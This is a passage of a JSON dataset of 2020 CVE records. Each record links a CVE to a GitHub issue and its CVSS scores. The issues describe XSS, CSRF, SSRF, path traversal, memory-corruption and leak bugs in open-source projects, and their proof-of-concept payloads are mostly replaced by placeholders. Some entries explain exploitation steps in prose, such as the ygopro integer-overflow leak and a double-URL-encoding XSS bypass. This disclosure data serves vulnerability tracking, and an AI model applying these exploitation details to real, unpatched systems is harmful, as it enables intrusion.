        "Issue_Url_new": "https://github.com/jianyan74/tinyshop/issues/14",
        "Repo_new": "jianyan74/tinyshop",
        "Issue_Created_At": "2020-07-12T12:16:11Z",
        "description": "XSS vulnerability in reply to product reviews. APITAG a free and open source mall based on APITAG has a stored XSS vulnerability that affects version NUMBERTAG APITAG allows XSS via the explain_first and again_explain parameters of the FILETAG page. Backend open source address: URLTAG Front end open source address: URLTAG rageframe2: URLTAG view images: POC APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-24074",
        "Issue_Url_old": "https://github.com/kn007/silk-v3-decoder/issues/62",
        "Issue_Url_new": "https://github.com/kn007/silk-v3-decoder/issues/62",
        "Repo_new": "kn007/silk-v3-decoder",
        "Issue_Created_At": "2020-06-05T18:28:58Z",
        "description": "The decoder has a stack overflow. The decoder has a stack overflow At NUMBERTAG lines of code in Decoder.c CODETAG SKP_int NUMBERTAG APITAG FILETAG Then the size of the copy is a very large number, resulting in a buffer overflow Test file: URLTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24119",
        "Issue_Url_old": "https://github.com/upx/upx/issues/388",
        "Issue_Url_new": "https://github.com/upx/upx/issues/388",
        "Repo_new": "upx/upx",
        "Issue_Created_At": "2020-07-22T09:10:40Z",
        "description": "Heap buffer overflow in APITAG What's the problem (or question)? A heap buffer overflow read in the latest commit APITAG URLTAG of the devel branch ASAN reports: ERRORTAG What should have happened? Check if the file is normal, exit if abnormal Do you have an idea for a solution? Add more checks How can we reproduce the issue? upx.out d APITAG poc: FILETAG Please tell us details about your environment. UPX version used ( APITAG ): CODETAG Host Operating System and version: Ubuntu NUMBERTAG LTS Host CPU architecture NUMBERTAG Target Operating System and version: same as Host Target CPU architecture: same as Host",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24130",
        "Issue_Url_old": "https://github.com/ponzu-cms/ponzu/issues/352",
        "Issue_Url_new": "https://github.com/ponzu-cms/ponzu/issues/352",
        "Repo_new": "ponzu-cms/ponzu",
        "Issue_Created_At": "2020-07-27T07:21:58Z",
        "description": "There is three CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following three pages NUMBERTAG FILETAG Add a administrator. ~~~html APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG FILETAG Delete a administrator use username(email), and the param 'id' is not useful, you can delete any user you think username(email). ~~~html APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG FILETAG It can edit configure, example NUMBERTAG Change HTTP Basic Auth APITAG to download a backup of your data via HTTP NUMBERTAG Change administrator email and used with FILETAG NUMBERTAG Change Client Secret which is used to validate requests. ~~~html APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG ~~~",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-24135",
        "Issue_Url_old": "https://github.com/vedees/wcms/issues/9",
        "Issue_Url_new": "https://github.com/vedees/wcms/issues/9",
        "Repo_new": "vedees/wcms",
        "Issue_Created_At": "2020-07-20T15:12:03Z",
        "description": "Reflected XSS vulnerability. Hi, dev team! There is Reflected XSS vulnerability in APITAG file. The vulnerable code is NUMBERTAG APITAG Example POC: Just send any js code in type parameter like: APITAG Reflected cross site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. To prevent xss use next manual: URLTAG Please let me know about any fixes, I would like to register CVE number.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-24136",
        "Issue_Url_old": "https://github.com/vedees/wcms/issues/12",
        "Issue_Url_new": "https://github.com/vedees/wcms/issues/12",
        "Repo_new": "vedees/wcms",
        "Issue_Created_At": "2020-07-20T15:25:18Z",
        "description": "Path Traversal vulnerability in PATHTAG Hi, dev team! There is Path Traversal vulnerability in APITAG file. The vulnerable code is: PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG Example POC: CODETAG A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files To prevent vulnerability use next manual: URLTAG (prevent section) Please let me know about any fixes, I would like to register CVE number.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24137",
        "Issue_Url_old": "https://github.com/vedees/wcms/issues/7",
        "Issue_Url_new": "https://github.com/vedees/wcms/issues/7",
        "Repo_new": "vedees/wcms",
        "Issue_Created_At": "2020-07-20T14:57:42Z",
        "description": "Path Traversal vulnerability . Hi, dev team! There is Path Traversal vulnerability in APITAG file. The vulnerable code is NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG Example POC: CODETAG A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files To prevent vulnerability use next manual: URLTAG (prevent section) Please let me know about any fixes, I would like to register CVE number.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24138",
        "Issue_Url_old": "https://github.com/vedees/wcms/issues/10",
        "Issue_Url_new": "https://github.com/vedees/wcms/issues/10",
        "Repo_new": "vedees/wcms",
        "Issue_Created_At": "2020-07-20T15:19:07Z",
        "description": "Reflected XSS vulnerability. Hi, dev team! There is Reflected XSS vulnerability in APITAG file. The vulnerable code is: PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG Example POC: Just send any js code in pagename parameter like: APITAG Reflected cross site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. To prevent xss use next manual: URLTAG Please let me know about any fixes, I would like to register CVE number.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-24139",
        "Issue_Url_old": "https://github.com/vedees/wcms/issues/8",
        "Issue_Url_new": "https://github.com/vedees/wcms/issues/8",
        "Repo_new": "vedees/wcms",
        "Issue_Created_At": "2020-07-20T15:05:53Z",
        "description": "SSRF Vulnerability . Hi, dev team! There is SSRF Vulnerability in APITAG file. The vulnerable code is NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG Example POC: CODETAG Server Side Request Forgery (SSRF) vulnerabilities let an attacker send crafted requests from the back end server of a vulnerable web application. It can help identify open ports, local network hosts and execute command on services (for example redis, by using APITAG scheme) To prevent vulnerability use next manual: FILETAG Please let me know about any fixes, I would like to register CVE number.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
        "severity": "HIGH",
        "baseScore": 8.3,
        "impactScore": 3.7,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24140",
        "Issue_Url_old": "https://github.com/vedees/wcms/issues/11",
        "Issue_Url_new": "https://github.com/vedees/wcms/issues/11",
        "Repo_new": "vedees/wcms",
        "Issue_Created_At": "2020-07-20T15:22:21Z",
        "description": "SSRF Vulnerability in PATHTAG Hi, dev team! There is SSRF Vulnerability in APITAG file. The vulnerable code is: PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG Example POC: APITAG Server Side Request Forgery (SSRF) vulnerabilities let an attacker send crafted requests from the back end server of a vulnerable web application. It can help identify open ports, local network hosts and execute command on services (for example redis, by using APITAG scheme) To prevent vulnerability use next manual: FILETAG Please let me know about any fixes, I would like to register CVE number.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
        "severity": "HIGH",
        "baseScore": 8.3,
        "impactScore": 3.7,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24164",
        "Issue_Url_old": "https://github.com/ptaoussanis/nippy/issues/130",
        "Issue_Url_new": "https://github.com/ptaoussanis/nippy/issues/130",
        "Repo_new": "ptaoussanis/nippy",
        "Issue_Created_At": "2020-07-24T15:47:42Z",
        "description": "Remote Code Execution vulnerability via Java's Serializable interface. Details coming",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24213",
        "Issue_Url_old": "https://github.com/Fluorohydride/ygopro/issues/2314",
        "Issue_Url_new": "https://github.com/fluorohydride/ygopro/issues/2314",
        "Repo_new": "fluorohydride/ygopro",
        "Issue_Created_At": "2020-07-31T14:38:56Z",
        "description": "Security Issue: Memory leak.. Memory leak This vulnerability happened when the function APITAG and APITAG been used. When the player sends a package with error 'mainc' size and 'sidec' size, the function APITAG haven't check those parameters is legal or not. Then this function will calculate the sum of those parameters. ERRORTAG The algorithm thinks 'mainc' and 'sidec' are two unsigned number, so there is an integer overflow, when we set those parameters like NUMBERTAG their sum will be zero. It is ok though but in the function APITAG it will cause a buffer overread. ERRORTAG We can see in this function, the parameters 'mainc' and 'sidec' were treat as two int type numbers. So if we set 'mainc' as NUMBERTAG fffffff' and 'sidec' as NUMBERTAG in this function it will read 'dbuf' from range NUMBERTAG to NUMBERTAG Function APITAG also do a important thing: If the memory's data can be found in APITAG function, then it will add it into 'deck'; Else if APITAG function can't find memory's data in database, it will record it in the errorcode and return. Then in the APITAG function, the errorcode will be writen into 'deck_error[dp >type]'. Now we can see the function APITAG ERRORTAG This function will check 'deck_error[dp >type]', if it is not zero, it will pack the errcode into 'scem' structure and send it to players. Thanks to it, we can get an easy way to leak the program memory. And here is my test program, it works well in my local environment. URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24263",
        "Issue_Url_old": "https://github.com/portainer/portainer/issues/4105",
        "Issue_Url_new": "https://github.com/portainer/portainer/issues/4105",
        "Repo_new": "portainer/portainer",
        "Issue_Created_At": "2020-07-27T03:51:32Z",
        "description": "Disable Container Capabilities for non admins. We currently provide the ability for a user to specify additional container capabilities when deploying a container, both using the container UX and also via a compose file. There are certain capabilities that could be escalate privilege higher than a user should need for reasonable activities, and therefore may be deemed a security risk. We need to provide a new security option that allows the administrator to disable the ability for non admin users to manually set container capabilities. This change should be reflected in the front end (remove the option to set capabilities), and also the backend (to block the use via stacks or API).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-24264",
        "Issue_Url_old": "https://github.com/portainer/portainer/issues/4106",
        "Issue_Url_new": "https://github.com/portainer/portainer/issues/4106",
        "Repo_new": "portainer/portainer",
        "Issue_Created_At": "2020-07-27T03:57:20Z",
        "description": "enforce the security switch \"disable the use of bind mounts\" when set via API. Right now we allow the Portainer administrator to \"disable the use of bind mounts by non admins\", which is purely a front end restriction, and is more of a \"hide the capability\". This feature stops using from selecting to use bind mounts in the container / service creation views, and stops the use of bind mounts when writing stacks. However, if a skilled user was to craft an API request to Portainer that included bind mounts, it would succeed as there is no backend enforcement. To ensure security, we should enforce this restriction via the backend so that it cannot be used through the Portainer API.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24265",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/616",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/616",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2020-07-30T07:46:09Z",
        "description": "FILETAG Expected behavior Get an a.cach at the path or exit when meet abnormal input. System : Tcpreplay Version NUMBERTAG tcpprep V ERRORTAG OS: ubuntu NUMBERTAG Additional context none.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24266",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/617",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/617",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2020-07-30T08:41:03Z",
        "description": "FILETAG Expected behavior Get an a.cach at the path or exit when meet abnormal input. System (please complete the following information): Tcpreplay Version NUMBERTAG tcpprep V ERRORTAG OS: ubuntu NUMBERTAG Additional context None.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24301",
        "Issue_Url_old": "https://github.com/jamesagnew/hapi-fhir/issues/2026",
        "Issue_Url_new": "https://github.com/hapifhir/hapi-fhir/issues/2026",
        "Repo_new": "hapifhir/hapi-fhir",
        "Issue_Created_At": "2020-08-08T20:05:26Z",
        "description": "XSS Vulnerability in Testpage Overlay. Thanks to Will Davison of NCC Group APITAG UK) for disclosing this vulnerability. Text of disclosure follows: > Evidence \u2013 Reflected XSS: > > It was possible to send a GET request to the HAPI FHIR Web Application such that any included malicious code would be executed in the victim\u2019s browser. This could be used to craft a phishing link, for example. > > By URL encoding twice, it was possible to bypass any sanitisation on URL parameters which were reflected In the page body. > The following double URL encoded payload was used to display an alert box: > > APITAG > > URL encoding once transforms the string into: > APITAG > URL encoding once more gives us our final payload of: > APITAG > > Being used to craft a APITAG Link such as: > URLTAG > > In the above example, the vulnerable parameter is \u201cid\u201d but this should also work for vid and account. It\u2019s likely that this issue is present in a few places, but I have not exhaustively tested. I would recommend reviewing the code in order to ensure both input sanitisation and output encoding are consistent across the application. > OWASP\u2019s Cheat Sheet series may be of some use here: FILETAG This vulnerability affects only users of the APITAG Overlay\" HAPI FHIR module. Maven coordinates for this module are: APITAG ca. APITAG APITAG hapi fhir testpage overlay Affected versions are any versions NUMBERTAG and below. This issue is resolved in version NUMBERTAG Analysis: Users of the HAPI FHIR Testpage Overlay can use a specially crafted URL to exploit an XSS vulnerability in this module, allowing arbitrary APITAG to be executed in the user's browser. The impact of this vulnerability is believed to be low, as this module is intended for testing and not believed to be widely used for any production purposes. Nonetheless, we recommend all users of the affected module upgrade immediately. A complete audit of the affected codebase has been completed in order to detect and resolve any similar issues.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-24327",
        "Issue_Url_old": "https://github.com/purple-WL/Discourse-sending-email-function-exist-Server-side-request-forgery-SSRF-/issues/1",
        "Issue_Url_new": "https://github.com/purple-wl/discourse-sending-email-function-exist-server-side-request-forgery-ssrf-/issues/1",
        "Repo_new": "purple-wl/discourse-sending-email-function-exist-server-side-request-forgery-ssrf-",
        "Issue_Created_At": "2020-08-12T07:04:02Z",
        "description": "exploitation of vulnerability . APITAG send a new email FILETAG APITAG to upload images from a website FILETAG NUMBERTAG send mail FILETAG APITAG email has been sent. FILETAG APITAG remote server received a GET request from the site\uff01 FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24343",
        "Issue_Url_old": "https://github.com/ccxvii/mujs/issues/136",
        "Issue_Url_new": "https://github.com/ccxvii/mujs/issues/136",
        "Repo_new": "ccxvii/mujs",
        "Issue_Created_At": "2020-06-28T19:13:31Z",
        "description": "APITAG heap use after free PATHTAG in APITAG git hash: APITAG cmd: APITAG POC: ERRORTAG Stack dump: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24344",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3976",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3976",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-07-05T20:43:50Z",
        "description": "Heap overflow in jerry core. APITAG revision git hash: APITAG Test case ERRORTAG In debug build, it triggers an assertion 'scope_stack_p > context_p >scope_stack_p' failed Execution steps ./jerry FILETAG Build cmd python tools/build.py compile flag=\" fsanitize=address\" Stack dump: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24345",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3977",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3977",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-07-06T05:01:36Z",
        "description": "Stack overflow in ecma_is_lexical_environment. APITAG revision git hash: APITAG Test case ERRORTAG Execution steps ./jerry FILETAG Build cmd python tools/build.py compile flag=\" fsanitize=address\" Stack dump: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24346",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/325",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/325",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2020-06-28T18:40:42Z",
        "description": "heap use after free in njs_json_parse_iterator_call. Version: APITAG , git commit APITAG POC: ERRORTAG cmd: APITAG Stack dump: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24347",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/323",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/323",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2020-06-27T19:58:35Z",
        "description": "Segfault in njs_lvlhsh_bucket_find. Version: APITAG , git commit APITAG POC: ERRORTAG cmd: APITAG Stack dump: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24348",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/322",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/322",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2020-06-27T19:55:59Z",
        "description": "Segfault in njs_json_stringify_iterator. Version: APITAG , git commit APITAG POC: CODETAG cmd: APITAG Stack dump: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24349",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/324",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/324",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2020-06-27T20:07:39Z",
        "description": "Control flow hijack in njs_value_property. Version: APITAG , git commit APITAG This bug is likely exploitable. POC: ERRORTAG cmd: APITAG Stack dump: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24368",
        "Issue_Url_old": "https://github.com/Icinga/icingaweb2/issues/4226",
        "Issue_Url_new": "https://github.com/icinga/icingaweb2/issues/4226",
        "Repo_new": "icinga/icingaweb2",
        "Issue_Created_At": "2020-08-14T12:33:43Z",
        "description": "Placeholder.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24372",
        "Issue_Url_old": "https://github.com/LuaJIT/LuaJIT/issues/603",
        "Issue_Url_new": "https://github.com/luajit/luajit/issues/603",
        "Repo_new": "luajit/luajit",
        "Issue_Created_At": "2020-07-14T01:15:30Z",
        "description": "Second segfault in lj_err_run. Hi, we found a crash in APITAG Version NUMBERTAG Git hash: APITAG POC: ERRORTAG Stack dump: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24381",
        "Issue_Url_old": "https://github.com/gunet/openeclass/issues/39",
        "Issue_Url_new": "https://github.com/gunet/openeclass/issues/39",
        "Repo_new": "gunet/openeclass",
        "Issue_Created_At": "2020-08-17T16:03:50Z",
        "description": "Improper Access Control by Directory Listing Misconfiguration. Improper Access Control by Directory Listing Misconfiguration that affects all versions When the webapp is poorly configured (directory listing is enabled), an unauthenticated user will be able to view and download students' uploaded assessments. APITAG Course link URLTAG Add \"work\" directory at the end URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24391",
        "Issue_Url_old": "https://github.com/mongodb-js/query-parser/issues/16",
        "Issue_Url_new": "https://github.com/mongodb-js/query-parser/issues/16",
        "Repo_new": "mongodb-js/query-parser",
        "Issue_Created_At": "2020-01-07T06:21:42Z",
        "description": "Migrate to vm2 instead of safer eval. Hi! safer eval URLTAG is now considered unsafe. A safer option would be vm2 URLTAG . This only requires changes in APITAG which shouldn't be too bad. I'm trying to get a PR up in the next two weeks.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24566",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6564",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6564",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2020-09-08T03:44:23Z",
        "description": "Passwords written to deployment log in plain text NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24566",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6563",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6563",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2020-09-08T03:28:35Z",
        "description": "Passwords written to deployment log in plain text. Description APITAG A regression was introduced that caused certain passwords to be written to the deployment log without being masked. This only affects deployment processes that ran steps on the server/worker (not on targets). Affected versions APITAG Octopus Server NUMBERTAG Links CVE: CVETAG URLTAG Internal issue: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24574",
        "Issue_Url_old": "https://github.com/jtesta/gog_galaxy_client_service_poc/issues/1",
        "Issue_Url_new": "https://github.com/jtesta/gog_galaxy_client_service_poc/issues/1",
        "Repo_new": "jtesta/gog_galaxy_client_service_poc",
        "Issue_Created_At": "2021-01-22T23:22:15Z",
        "description": "APITAG status update. APITAG in case anyone was wondering, the APITAG still works on GOG Galaxy NUMBERTAG last tested as of time of wriitng this). Just compiled and tested it and was able to create a local user and add them to the local administrators group on a testbed system. GOG has yet to fix the underlying issue, it seems. CVETAG is alive and well, yet.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24616",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2814",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2814",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-08-11T02:05:43Z",
        "description": "Block one more gadget type (xxx, CVE xxxx xxx). (placeholder until investigated, evaluated, fixed) Another gadget type(s) reported regarding class(es) of [TO BE ADDED]. library. See URLTAG for description of the general problem. Mitre id: [to be allocated] Reporter(s): [to be added] Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-24740",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/81",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/81",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2019-10-21T08:14:08Z",
        "description": "An issue was discovered in Pluck NUMBERTAG de NUMBERTAG There is a CSRF vulnerability that can editpage via a APITAG CSRF POC: CODETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-24750",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2798",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2798",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-07-16T17:25:52Z",
        "description": "Block one more gadget type (xxx, CVE xxxx xxx). (placeholder until investigated, evaluated, fixed) Another gadget type(s) reported regarding class(es) of [TO BE ADDED]. library. See URLTAG for description of the general problem. Mitre id: [to be allocated] Reporter(s): [to be added] Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-24772",
        "Issue_Url_old": "https://github.com/Dreamacro/clash/issues/910",
        "Issue_Url_new": "https://github.com/dreamacro/clash/issues/910",
        "Repo_new": "dreamacro/clash",
